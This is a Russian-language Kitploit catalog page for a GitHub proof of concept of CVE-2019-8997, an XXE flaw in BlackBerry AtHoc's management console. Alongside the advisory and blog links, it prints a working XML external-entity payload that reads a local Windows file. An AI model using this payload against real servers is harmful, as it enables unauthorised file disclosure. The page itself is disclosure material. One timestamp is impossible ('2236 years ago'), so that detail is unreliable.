Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-8997 — Уязвимость внедрения внешних XML-сущностей (XXE) в системе управления (консоли) BlackBerry AtHoc версий ранее 7.6 HF-567 может позволить злоумышленнику потенциально читать произвольные локальные файлы с сервера приложения или выполнять запросы в сети путем ввода вредоносно сформированного XML в существующее поле. | Kitploit
Инструменты/GitHubGitHub/nxkennedy/cve-2019-8997
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubnxkennedy/cve-2019-8997

CVE-2019-8997

Репозиторий
2236 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Уязвимость внедрения внешних XML-сущностей (XXE) в системе управления (консоли) BlackBerry AtHoc версий ранее 7.6 HF-567 может позволить злоумышленнику потенциально читать произвольные локальные файлы с сервера приложения или выполнять запросы в сети путем ввода вредоносно сформированного XML в существующее поле.

Поделиться

CVE-2019-8997

Уязвимость внедрения внешних XML-сущностей (XXE) в системе управления (консоли) BlackBerry AtHoc версий ранее 7.6 HF-567 может позволить злоумышленнику читать произвольные локальные файлы с сервера приложения или выполнять сетевые запросы путем ввода специально созданного XML-кода в существующее поле.

Сообщил

Nolan B. Kennedy (nxkennedy)

Рекомендации по безопасности

http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997

Пост в блоге

https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/

PoC-эксплойт

root@kitploit:~
<!DOCTYPE doc [
<!ELEMENT doc ANY > 
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">

<doc>&foo;</doc>

<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>
Скачать инструмент